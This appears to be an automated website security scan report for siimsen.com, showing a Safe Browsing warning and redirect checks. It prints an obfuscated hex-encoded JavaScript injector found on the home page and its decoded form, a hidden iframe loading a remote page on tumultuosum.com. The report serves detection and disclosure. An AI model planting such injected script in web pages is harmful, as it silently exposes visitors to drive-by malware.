Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=siimsen.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://siimsen.com/ | 200 OK Content-Length: 2501 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function oxsletpvxjt(qixfiot){var ddrbvc="";for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));}document.write(ddrbvc);}oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, "")); Decoded script: <iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe> Antivirus reports:
| ||
http://siimsen.com/test404page.js | 404 Not Found Content-Length: 595 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: siimsen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 12:14:26 GMT
Server: Apache
Content-Length: 2501
Content-Type: text/html
...2501 bytes of data.
GET / HTTP/1.1
Host: siimsen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 12:14:26 GMT
Server: Apache
Content-Length: 2501
Content-Type: text/html
...2501 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: siimsen.com
Referer: http://www.google.com/search?q=siimsen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: siimsen.com
Referer: http://www.google.com/search?q=siimsen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.